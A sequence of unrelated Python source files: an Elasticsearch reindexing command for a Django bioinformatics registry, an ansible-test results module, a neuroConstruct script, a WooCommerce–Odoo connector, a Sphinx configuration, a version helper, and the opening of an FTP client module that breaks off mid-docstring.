from django.core.management.base import BaseCommand, CommandError from elasticsearch import Elasticsearch from elixir.models import * from elixir.serializers import * import random, time from multiprocessing import Pool, cpu_count from rest_framework.renderers import JSONRenderer def parallel_function(x): resource = ResourceSerializer(Resource.objects.get(id=x[0]), many=False).data return JSONRenderer().render(resource) def parallel_function_v2(x): resource = LegacyResourceSerializer(Resource.objects.get(id=x[0]), many=False).data return JSONRenderer().render(resource) class Command(BaseCommand): help = 'Regenerate the Elasticsearch index' def handle(self, *args, **options): self.stdout.write('Regenerating the ES') es = Elasticsearch([{'host': 'localhost', 'port': 9200}]) resourceList = Resource.objects.filter(visibility=1) self.stdout.write('--------------------\nid\t:\tname\n--------------------') # if sending with curl you need to wrap the object below -> {"mappings": object} mapping_subdomains = { "subdomains": { "properties": { "domain": { "type": "string", "fields": { "raw": { "type": "string", "index": "not_analyzed" } } }, "resources": { "properties": { "biotoolsID": { "type": "string", "fields": { "raw": { "type": "string", "index": "not_analyzed" } } }, "versionId": { "type": "string", "fields": { "raw": { "type": "string", "index": "not_analyzed" } } } } } } } } es.indices.create('elixir', ignore=400) es.indices.create('elixir_v2', ignore=400) time.sleep(3) # ADD SETTINGS settings = { "analysis": { "analyzer": { "not_analyzed_case_insensitive":{ "tokenizer":"keyword", "filter":"lowercase" } } }, "index": { "max_result_window": 50000 } } es.indices.close (index='elixir') es.indices.close (index='elixir_v2') es.indices.put_settings (index='elixir', body=settings) es.indices.put_settings (index='elixir_v2', body=settings) es.indices.open (index='elixir') es.indices.open (index='elixir_v2') # ADD MAPPING mapping = { "tool" : { "properties" : { "collectionID" : { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True, "fields": { "raw": { "type": "keyword" } } }, "description" : { "type" : "text", "analyzer": "english", "fielddata": True }, "homepage" : { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True }, "name" : { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True, "fields": { "raw": { "type": "keyword" } } }, "topic" : { "properties" : { "term" : { "type" : "text", "analyzer": "english", "fielddata": True, "fields": { "raw": { "type": "keyword" } } } } }, "function": { "properties": { "note": { "type": "text", "analyzer": "english", "fielddata": True }, "cmd": { "type": "text", "analyzer": "english", "fielddata": True }, "input": { "properties": { "data": { "properties": { "term": { "type": "text", "analyzer": "english", "fielddata": True, "fields": { "raw": { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True } } } } }, "format": { "properties": { "term": { "type": "text", "analyzer": "english", "fielddata": True, "fields": { "raw": { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True } } } } } } }, "output": { "properties": { "data": { "properties": { "term": { "type": "text", "analyzer": "english", "fielddata": True, "fields": { "raw": { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True } } } } }, "format": { "properties": { "term": { "type": "text", "analyzer": "english", "fielddata": True, "fields": { "raw": { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True } } } } } } }, "operation": { "properties": { "term": { "type": "text", "analyzer": "english", "fielddata": True, "fields": { "raw": { "type": "keyword" } } } } } } }, # "contact" : { # "properties" : { # "name" : { # "type" : "text", # "analyzer": "english", # "fielddata": True # } # } # }, # Maybe add other fields here like credit orcidid, credit elixirPlatform , elixirNode "credit" : { "properties" : { "note" : { "type" : "text", "analyzer": "english", "fielddata": True }, "name" : { "type" : "text", "analyzer": "english", "fielddata": True, "fields": { "raw": { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True } } } } }, "documentation" : { "properties" : { "note" : { "type" : "text", "analyzer": "english", "fielddata": True } } }, "biotoolsID" : { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True }, "id" : { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True }, "language" : { "type" : "text", "fielddata": True, "analyzer": "not_analyzed_case_insensitive" }, "license" : { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True }, "operatingSystem" : { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True }, # "otherID" : { # "properties" : { # "value" : { # "type" : "text", # "analyzer": "not_analyzed_case_insensitive", # "fielddata": True # }, # "type" : { # "type" : "text", # "analyzer": "not_analyzed_case_insensitive", # "fielddata": True # }, # "version" : { # "type" : "text", # "analyzer": "not_analyzed_case_insensitive", # "fielddata": True # } # } # }, "toolType" : { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True }, "version" : { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True }, # "version" : { # "properties" : { # "version" : { # "type" : "text", # "analyzer": "english", # "fielddata": True # } # } # }, "versionId" : { "type" : "text", "fielddata": True, "analyzer": "not_analyzed_case_insensitive" }, "maturity" : { "type" : "text", "fielddata": True, "analyzer": "not_analyzed_case_insensitive" }, "cost" : { "type" : "text", "fielddata": True, "analyzer": "not_analyzed_case_insensitive" }, "owner" : { "type" : "text", "fielddata": True, "analyzer": "not_analyzed_case_insensitive" } } } } es.indices.put_mapping(index='elixir', doc_type='tool', body=mapping) es.indices.put_mapping(index='elixir_v2', doc_type='tool', body=mapping) es.indices.create('domains') es.indices.put_mapping(index='domains', doc_type='subdomains', body=mapping_subdomains) rl_id = Resource.objects.filter(visibility=1).values_list('id') pool = Pool(processes=cpu_count()) # schema 2.0 res_v2 = pool.map_async(parallel_function_v2, rl_id) results_v2 = res_v2.get(timeout=10000) for el in results_v2: es.index(index='elixir_v2', doc_type='tool', body=el) # schema 3.0 res = pool.map_async(parallel_function, rl_id) results = res.get(timeout=10000) for el in results: es.index(index='elixir', doc_type='tool', body=el) # for resourceItem in resourceList: # resource = ResourceSerializer(resourceItem, many=False).data # self.stdout.write('%s\t:\t%s' % (resource['id'], resource['name'])) # es.index(index='elixir', doc_type='tool', body=resource) # this is not really correct because the there are multiple versions to a resource # should probably be the same for domain resource , or just remove version and versionId for domain in Domain.objects.all(): es.index(index='domains', doc_type='subdomains', body={'domain':domain.name, 'title': domain.title, 'sub_title': domain.sub_title, 'description': domain.description, 'resources': map(lambda x: {'biotoolsID': x.biotoolsID, 'versionId': x.versionId, 'name': x.name, 'version': x.version}, domain.domainresource_set.all())}) self.stdout.write('%s'%(domain.name)) # for domain in Domain.objects.all(): # es.index(index='domains', doc_type='subdomains', body={'domain':domain.name, 'title': domain.title, 'sub_title': domain.sub_title, 'description': domain.description, 'resources': map(lambda x: {'biotoolsID': x.biotoolsID, 'versionId': x.versionId, 'name': x.name}, domain.domainresource_set.all())}) # self.stdout.write('%s'%(domain.name))
"""Classes for storing and processing test results.""" from __future__ import absolute_import, print_function import datetime import json import os from lib.util import ( display, ) from lib.config import ( TestConfig, ) def calculate_best_confidence(choices, metadata): """ :type choices: tuple[tuple[str, int]] :type metadata: Metadata :rtype: int """ best_confidence = 0 for path, line in choices: confidence = calculate_confidence(path, line, metadata) best_confidence = max(confidence, best_confidence) return best_confidence def calculate_confidence(path, line, metadata): """ :type path: str :type line: int :type metadata: Metadata :rtype: int """ ranges = metadata.changes.get(path) # no changes were made to the file if not ranges: return 0 # changes were made to the same file and line if any(r[0] <= line <= r[1] in r for r in ranges): return 100 # changes were made to the same file and the line number is unknown if line == 0: return 75 # changes were made to the same file and the line number is different return 50 class TestResult(object): """Base class for test results.""" def __init__(self, command, test, python_version=None): """ :type command: str :type test: str :type python_version: str """ self.command = command self.test = test self.python_version = python_version self.name = self.test or self.command if self.python_version: self.name += '-python-%s' % self.python_version try: import junit_xml except ImportError: junit_xml = None self.junit = junit_xml def write(self, args): """ :type args: TestConfig """ self.write_console() self.write_bot(args) if args.lint: self.write_lint() if args.junit: if self.junit: self.write_junit(args) else: display.warning('Skipping junit xml output because the `junit-xml` python package was not found.', unique=True) def write_console(self): """Write results to console.""" pass def write_lint(self): """Write lint results to stdout.""" pass def write_bot(self, args): """ :type args: TestConfig """ pass def write_junit(self, args): """ :type args: TestConfig """ pass def create_path(self, directory, extension): """ :type directory: str :type extension: str :rtype: str """ path = 'test/results/%s/ansible-test-%s' % (directory, self.command) if self.test: path += '-%s' % self.test if self.python_version: path += '-python-%s' % self.python_version path += extension return path def save_junit(self, args, test_case, properties=None): """ :type args: TestConfig :type test_case: junit_xml.TestCase :type properties: dict[str, str] | None :rtype: str | None """ path = self.create_path('junit', '.xml') test_suites = [ self.junit.TestSuite( name='ansible-test', test_cases=[test_case], timestamp=datetime.datetime.utcnow().replace(microsecond=0).isoformat(), properties=properties, ), ] report = self.junit.TestSuite.to_xml_string(test_suites=test_suites, prettyprint=True, encoding='utf-8') if args.explain: return with open(path, 'wb') as xml: xml.write(report.encode('utf-8', 'strict')) class TestTimeout(TestResult): """Test timeout.""" def __init__(self, timeout_duration): """ :type timeout_duration: int """ super(TestTimeout, self).__init__(command='timeout', test='') self.timeout_duration = timeout_duration def write(self, args): """ :type args: TestConfig """ message = 'Tests were aborted after exceeding the %d minute time limit.' % self.timeout_duration # Include a leading newline to improve readability on Shippable "Tests" tab. # Without this, the first line becomes indented. output = ''' One or more of the following situations may be responsible: - Code changes have resulted in tests that hang or run for an excessive amount of time. - Tests have been added which exceed the time limit when combined with existing tests. - Test infrastructure and/or external dependencies are operating slower than normal.''' if args.coverage: output += '\n- Additional overhead from collecting code coverage has resulted in tests exceeding the time limit.' output += '\n\nConsult the console log for additional details on where the timeout occurred.' timestamp = datetime.datetime.utcnow().replace(microsecond=0).isoformat() # hack to avoid requiring junit-xml, which isn't pre-installed on Shippable outside our test containers xml = ''' <?xml version="1.0" encoding="utf-8"?> <testsuites disabled="0" errors="1" failures="0" tests="1" time="0.0"> \t<testsuite disabled="0" errors="1" failures="0" file="None" log="None" name="ansible-test" skipped="0" tests="1" time="0" timestamp="%s" url="None"> \t\t<testcase classname="timeout" name="timeout"> \t\t\t<error message="%s" type="error">%s</error> \t\t</testcase> \t</testsuite> </testsuites> ''' % (timestamp, message, output) path = self.create_path('junit', '.xml') with open(path, 'w') as junit_fd: junit_fd.write(xml.lstrip()) class TestSuccess(TestResult): """Test success.""" def write_junit(self, args): """ :type args: TestConfig """ test_case = self.junit.TestCase(classname=self.command, name=self.name) self.save_junit(args, test_case) class TestSkipped(TestResult): """Test skipped.""" def write_console(self): """Write results to console.""" display.info('No tests applicable.', verbosity=1) def write_junit(self, args): """ :type args: TestConfig """ test_case = self.junit.TestCase(classname=self.command, name=self.name) test_case.add_skipped_info('No tests applicable.') self.save_junit(args, test_case) class TestFailure(TestResult): """Test failure.""" def __init__(self, command, test, python_version=None, messages=None, summary=None): """ :type command: str :type test: str :type python_version: str | None :type messages: list[TestMessage] | None :type summary: unicode | None """ super(TestFailure, self).__init__(command, test, python_version) if messages: messages = sorted(messages, key=lambda m: m.sort_key) else: messages = [] self.messages = messages self.summary = summary def write(self, args): """ :type args: TestConfig """ if args.metadata.changes: self.populate_confidence(args.metadata) super(TestFailure, self).write(args) def write_console(self): """Write results to console.""" if self.summary: display.error(self.summary) else: if self.python_version: specifier = ' on python %s' % self.python_version else: specifier = '' display.error('Found %d %s issue(s)%s which need to be resolved:' % (len(self.messages), self.test or self.command, specifier)) for message in self.messages: display.error(message.format(show_confidence=True)) def write_lint(self): """Write lint results to stdout.""" if self.summary: command = self.format_command() message = 'The test `%s` failed. See stderr output for details.' % command path = 'test/runner/ansible-test' message = TestMessage(message, path) print(message) else: for message in self.messages: print(message) def write_junit(self, args): """ :type args: TestConfig """ title = self.format_title() output = self.format_block() test_case = self.junit.TestCase(classname=self.command, name=self.name) # Include a leading newline to improve readability on Shippable "Tests" tab. # Without this, the first line becomes indented. test_case.add_failure_info(message=title, output='\n%s' % output) self.save_junit(args, test_case) def write_bot(self, args): """ :type args: TestConfig """ docs = self.find_docs() message = self.format_title(help_link=docs) output = self.format_block() if self.messages: verified = all((m.confidence or 0) >= 50 for m in self.messages) else: verified = False bot_data = dict( verified=verified, docs=docs, results=[ dict( message=message, output=output, ), ], ) path = self.create_path('bot', '.json') if args.explain: return with open(path, 'w') as bot_fd: json.dump(bot_data, bot_fd, indent=4, sort_keys=True) bot_fd.write('\n') def populate_confidence(self, metadata): """ :type metadata: Metadata """ for message in self.messages: if message.confidence is None: message.confidence = calculate_confidence(message.path, message.line, metadata) def format_command(self): """ :rtype: str """ command = 'ansible-test %s' % self.command if self.test: command += ' --test %s' % self.test if self.python_version: command += ' --python %s' % self.python_version return command def find_docs(self): """ :rtype: str """ testing_docs_url = 'https://docs.ansible.com/ansible/devel/dev_guide/testing' testing_docs_dir = 'docs/docsite/rst/dev_guide/testing' url = '%s/%s/' % (testing_docs_url, self.command) path = os.path.join(testing_docs_dir, self.command) if self.test: url += '%s.html' % self.test path = os.path.join(path, '%s.rst' % self.test) if os.path.exists(path): return url return None def format_title(self, help_link=None): """ :type help_link: str | None :rtype: str """ command = self.format_command() if self.summary: reason = 'the error' else: reason = '1 error' if len(self.messages) == 1 else '%d errors' % len(self.messages) if help_link: help_link_markup = ' [[explain](%s)]' % help_link else: help_link_markup = '' title = 'The test `%s`%s failed with %s:' % (command, help_link_markup, reason) return title def format_block(self): """ :rtype: str """ if self.summary: block = self.summary else: block = '\n'.join(m.format() for m in self.messages) message = block.strip() # Hack to remove ANSI color reset code from SubprocessError messages. message = message.replace(display.clear, '') return message class TestMessage(object): """Single test message for one file.""" def __init__(self, message, path, line=0, column=0, level='error', code=None, confidence=None): """ :type message: str :type path: str :type line: int :type column: int :type level: str :type code: str | None :type confidence: int | None """ self.path = path self.line = line self.column = column self.level = level self.code = code self.message = message self.confidence = confidence def __str__(self): return self.format() def format(self, show_confidence=False): """ :type show_confidence: bool :rtype: str """ if self.code: msg = '%s %s' % (self.code, self.message) else: msg = self.message if show_confidence and self.confidence is not None: msg += ' (%d%%)' % self.confidence return '%s:%s:%s: %s' % (self.path, self.line, self.column, msg) @property def sort_key(self): """ :rtype: str """ return '%s:%6d:%6d:%s:%s' % (self.path, self.line, self.column, self.code or '', self.message)
# # # A file which opens a neuroConstruct project, loads a cell morphology file # and adds the cell to the project # # Author: Padraig Gleeson # # This file has been developed as part of the neuroConstruct project # This work has been funded by the Medical Research Council # # try: from java.io import File except ImportError: print "Note: this file should be run using ..\\nC.bat -python XXX.py' or './nC.sh -python XXX.py'" print "See http://www.neuroconstruct.org/docs/python.html for more details" quit() from ucl.physiol.neuroconstruct.project import ProjectManager from ucl.physiol.neuroconstruct.cell.converters import MorphMLConverter # Load an existing neuroConstruct project projFile = File("TestPython/TestPython.neuro.xml") print "Loading project from file: " + projFile.getAbsolutePath()+", exists: "+ str(projFile.exists()) pm = ProjectManager() myProject = pm.loadProject(projFile) print "Loaded project: " + myProject.getProjectName() morphDir = File("../osb/showcase/neuroConstructShowcase/Ex3_Morphology/importedMorphologies/") morphmlFile = File(morphDir, "SimplePurkinjeCell.morph.xml") print "Going to load morphology from: " + morphmlFile.getCanonicalPath() converter = MorphMLConverter() cell = converter.loadFromMorphologyFile(morphmlFile, "NewCell") print "Loaded cell: " + cell.getInstanceName() + " with " + str(cell.getAllSegments().size()) +" segments" myProject.cellManager.addCellType(cell) # Actually add it to the project myProject.cellGroupsInfo.setCellType("SampleCellGroup", cell.getInstanceName()) # Set the type of an existing cell group to this # Now the project can be generated as in Ex5_MultiSimGenerate.py # * OR * # Save project # Uncomment these lines to save the morphology in the project, then view the # updated project in neuroConstruct ''' myProject.markProjectAsEdited() myProject.saveProject() # Run neuroConstruct and check that the cell has been added from ucl.physiol.neuroconstruct.gui import MainFrame from ucl.physiol.neuroconstruct.utils import GuiUtils frame = MainFrame() GuiUtils.centreWindow(frame) frame.setVisible(1) frame.doLoadProject(projFile.getCanonicalPath()) '''
# -*- coding: utf-8 -*- # # # Tech-Receptives Solutions Pvt. Ltd. # Copyright (C) 2009-TODAY Tech-Receptives(<http://www.techreceptives.com>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # # import logging import xmlrpclib from openerp import models, fields from openerp.addons.connector.queue.job import job from openerp.addons.connector.exception import MappingError from openerp.addons.connector.unit.mapper import (mapping, ImportMapper ) from openerp.addons.connector.exception import IDMissingInBackend from ..unit.backend_adapter import (GenericAdapter) from ..unit.import_synchronizer import (DelayedBatchImporter, WooImporter) from ..connector import get_environment from ..backend import woo _logger = logging.getLogger(__name__) class WooProductCategory(models.Model): _name = 'woo.product.category' _inherit = 'woo.binding' _inherits = {'product.category': 'openerp_id'} _description = 'woo product category' _rec_name = 'name' openerp_id = fields.Many2one(comodel_name='product.category', string='category', required=True, ondelete='cascade') backend_id = fields.Many2one( comodel_name='wc.backend', string='Woo Backend', store=True, readonly=False, ) slug = fields.Char('Slung Name') woo_parent_id = fields.Many2one( comodel_name='woo.product.category', string='Woo Parent Category', ondelete='cascade',) description = fields.Char('Description') count = fields.Integer('count') @woo class CategoryAdapter(GenericAdapter): _model_name = 'woo.product.category' _woo_model = 'products/categories' def _call(self, method, arguments): try: return super(CategoryAdapter, self)._call(method, arguments) except xmlrpclib.Fault as err: # this is the error in the WooCommerce API # when the customer does not exist if err.faultCode == 102: raise IDMissingInBackend else: raise def search(self, filters=None, from_date=None, to_date=None): """ Search records according to some criteria and return a list of ids :rtype: list """ if filters is None: filters = {} WOO_DATETIME_FORMAT = '%Y/%m/%d %H:%M:%S' dt_fmt = WOO_DATETIME_FORMAT if from_date is not None: filters.setdefault('updated_at', {}) filters['updated_at']['from'] = from_date.strftime(dt_fmt) if to_date is not None: filters.setdefault('updated_at', {}) filters['updated_at']['to'] = to_date.strftime(dt_fmt) return self._call('products/categories/list', [filters] if filters else [{}]) @woo class CategoryBatchImporter(DelayedBatchImporter): """ Import the WooCommerce Partners. For every partner in the list, a delayed job is created. """ _model_name = ['woo.product.category'] def _import_record(self, woo_id, priority=None): """ Delay a job for the import """ super(CategoryBatchImporter, self)._import_record( woo_id, priority=priority) def run(self, filters=None): """ Run the synchronization """ from_date = filters.pop('from_date', None) to_date = filters.pop('to_date', None) record_ids = self.backend_adapter.search( filters, from_date=from_date, to_date=to_date, ) _logger.info('search for woo Product Category %s returned %s', filters, record_ids) for record_id in record_ids: self._import_record(record_id) CategoryBatchImporter = CategoryBatchImporter @woo class ProductCategoryImporter(WooImporter): _model_name = ['woo.product.category'] def _import_dependencies(self): """ Import the dependencies for the record""" record = self.woo_record # import parent category # the root category has a 0 parent_id record = record['product_category'] if record['parent']: parent_id = record['parent'] if self.binder.to_openerp(parent_id) is None: importer = self.unit_for(WooImporter) importer.run(parent_id) return def _create(self, data): openerp_binding = super(ProductCategoryImporter, self)._create(data) return openerp_binding def _after_import(self, binding): """ Hook called at the end of the import """ return ProductCategoryImport = ProductCategoryImporter @woo class ProductCategoryImportMapper(ImportMapper): _model_name = 'woo.product.category' @mapping def name(self, record): if record['product_category']: rec = record['product_category'] return {'name': rec['name']} @mapping def backend_id(self, record): return {'backend_id': self.backend_record.id} # @mapping def parent_id(self, record): if record['product_category']: rec = record['product_category'] if not rec['parent']: return binder = self.binder_for() category_id = binder.to_openerp(rec['parent'], unwrap=True) woo_cat_id = binder.to_openerp(rec['parent']) if category_id is None: raise MappingError("The product category with " "woo id %s is not imported." % rec['parent']) return {'parent_id': category_id, 'woo_parent_id': woo_cat_id} @job(default_channel='root.woo') def category_import_batch(session, model_name, backend_id, filters=None): """ Prepare the import of category modified on WooCommerce """ env = get_environment(session, model_name, backend_id) importer = env.get_connector_unit(CategoryBatchImporter) importer.run(filters=filters)
# -*- coding: utf-8 -*- # # MXCuBE3 documentation build configuration file, created by # sphinx-quickstart on Tue Nov 10 16:07:35 2015. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import sys import os import shlex # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. #sys.path.insert(0, os.path.abspath('.')) sys.path.append(os.path.abspath('../../')) sys.path.append(os.path.abspath('../../mxcube3/')) sys.path.append(os.path.abspath('../../mxcube3/HardwareObjects')) sys.path.append(os.path.abspath('../../mxcube3/HardwareRepository')) # -- General configuration ------------------------------------------------ # If your documentation needs a minimal Sphinx version, state it here. #needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. #extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.todo'] extensions = ['sphinxcontrib.httpdomain','sphinxcontrib.autohttp.flask', 'sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.todo'] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # source_suffix = ['.rst', '.md'] source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8-sig' # The master toctree document. master_doc = 'index' # General information about the project. project = u'MXCuBE3' copyright = u'2015, MXCuBE Collaboration' author = u'MXCuBE Collaboration' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = '0.1' # The full version, including alpha/beta/rc tags. release = '0.1' # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. #today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = [] # The reST default role (used for this markup: `text`) to use for all # documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # If true, keep warnings as "system message" paragraphs in the built documents. #keep_warnings = False # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = False # -- Options for HTML output ---------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. html_theme = 'alabaster' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. #html_theme_path = [] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. #html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # Add any extra paths that contain custom files (such as robots.txt or # .htaccess) here, relative to this directory. These files are copied # directly to the root of the documentation. #html_extra_path = [] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. #html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. #html_domain_indices = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. #html_show_sourcelink = True # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. #html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. #html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. #html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = None # Language to be used for generating the HTML full-text search index. # Sphinx supports the following languages: # 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja' # 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr' #html_search_language = 'en' # A dictionary with options for the search language support, empty by default. # Now only 'ja' uses this config value #html_search_options = {'type': 'default'} # The name of a javascript file (relative to the configuration directory) that # implements a search results scorer. If empty, the default will be used. #html_search_scorer = 'scorer.js' # Output file base name for HTML help builder. htmlhelp_basename = 'MXCuBE3doc' # -- Options for LaTeX output --------------------------------------------- latex_elements = { # The paper size ('letterpaper' or 'a4paper'). #'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). #'pointsize': '10pt', # Additional stuff for the LaTeX preamble. #'preamble': '', # Latex figure (float) alignment #'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ (master_doc, 'MXCuBE3.tex', u'MXCuBE3 Documentation', u'MXCuBE Collaboration', 'manual'), ] # The name of an image file (relative to this directory) to place at the top of # the title page. #latex_logo = None # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. #latex_use_parts = False # If true, show page references after internal links. #latex_show_pagerefs = False # If true, show URL addresses after external links. #latex_show_urls = False # Documents to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_domain_indices = True # -- Options for manual page output --------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ (master_doc, 'mxcube3', u'MXCuBE3 Documentation', [author], 1) ] # If true, show URL addresses after external links. #man_show_urls = False # -- Options for Texinfo output ------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ (master_doc, 'MXCuBE3', u'MXCuBE3 Documentation', author, 'MXCuBE3', 'One line description of project.', 'Miscellaneous'), ] # Documents to append as an appendix to all manuals. #texinfo_appendices = [] # If false, no module index is generated. #texinfo_domain_indices = True # How to display URL addresses: 'footnote', 'no', or 'inline'. #texinfo_show_urls = 'footnote' # If true, do not generate a @detailmenu in the "Top" node's menu. #texinfo_no_detailmenu = False
""" Current logger version. """ from subprocess import Popen, PIPE from os.path import abspath, dirname VERSION = (0, 2, 0, 'dev', 0) def git_sha(): loc = abspath(dirname(__file__)) try: p = Popen( "cd \"%s\" && git log -1 --format=format:%%h" % loc, shell=True, stdout=PIPE, stderr=PIPE ) return p.communicate()[0] except OSError: return None def get_version(form='short'): """ Returns the version string. Takes single argument ``form``, which should be one of the following strings: * ``short`` Returns major + minor branch version string with the format of B.b.t. * ``normal`` Returns human readable version string with the format of B.b.t _type type_num. * ``verbose`` Returns a verbose version string with the format of B.b.t _type type_num@git_sha * ``all`` Returns a dict of all versions. """ versions = {} branch = "%s.%s" % (VERSION[0], VERSION[1]) tertiary = VERSION[2] type_ = VERSION[3] type_num = VERSION[4] versions["branch"] = branch v = versions["branch"] if tertiary: versions["tertiary"] = "." + str(tertiary) v += versions["tertiary"] versions['short'] = v if form is "short": return v v += " " + type_ + " " + str(type_num) versions["normal"] = v if form is "normal": return v v += " @" + git_sha() versions["verbose"] = v if form is "verbose": return v if form is "all": return versions
"""An FTP client class and some helper functions. Based on RFC 959: File Transfer Protocol (FTP), by J. Postel and J. Reynolds Example: >>> from ftplib import FTP >>> ftp = FTP('ftp.python.org') # connect to host, default port >>> ftp.login() # default, i.e.: user anonymous, passwd anonymous@ '230 Guest login ok, access restrictions apply.' >>> ftp.retrlines('LIST') # list directory contents total 9 drwxr-xr-x 8 root wheel 1024 Jan 3 1994 . drwxr-xr-x 8 root wheel 1024 Jan 3 1994 .. drwxr-xr-x 2 root wheel 1024 Jan 3 1994 bin drwxr-xr-x 2 root wheel 1024 Jan 3 1994 etc d-wxrwxr-x 2 ftp wheel 1024 Sep 5 13:43 incoming drwxr-xr-x 2 root wheel 1024 Nov 17 1993 lib drwxr-xr-x 6 1094 wheel 1024 Sep 13 19:07 pub drwxr-xr-x 3 root wheel 1024 Jan 3 1994 usr -rw-r--r-- 1 root root 312 Aug 1 1994 welcome.msg '226 Transfer complete.' >>> ftp.quit() '221 Goodbye.' >>> A nice test that reveals some of the network dialogue would be: python ftplib.py -d localhost -l -p -l """ # # Changes and improvements suggested by Steve Majewski. # Modified by Jack to work on the mac. # Modified by Siebren to support docstrings and PASV. # Modified by Phil Schwartz to add storbinary and storlines callbacks. # import os import sys # Import SOCKS module if it exists, else standard socket module socket try: import SOCKS; socket = SOCKS; del SOCKS # import SOCKS as socket from socket import getfqdn; socket.getfqdn = getfqdn; del getfqdn except ImportError: import socket from socket import _GLOBAL_DEFAULT_TIMEOUT __all__ = ["FTP","Netrc"] # Magic number from <socket.h> MSG_OOB = 0x1 # Process data out of band # The standard FTP server control port FTP_PORT = 21 # Exception raised when an error or invalid response is received class Error(Exception): pass class error_reply(Error): pass # unexpected [123]xx reply class error_temp(Error): pass # 4xx errors class error_perm(Error): pass # 5xx errors class error_proto(Error): pass # response does not begin with [1-5] # All exceptions (hopefully) that may be raised here and that aren't # (always) programming errors on our side all_errors = (Error, IOError, EOFError) # Line terminators (we always output CRLF, but accept any of CRLF, CR, LF) CRLF = '\r\n' # The class itself class FTP: '''An FTP client class. To create a connection, call the class using these arguments: host, user, passwd, acct, timeout The first four arguments are all strings, and have default value ''. timeout must be numeric and defaults to None if not passed, meaning that no timeout will be set on any 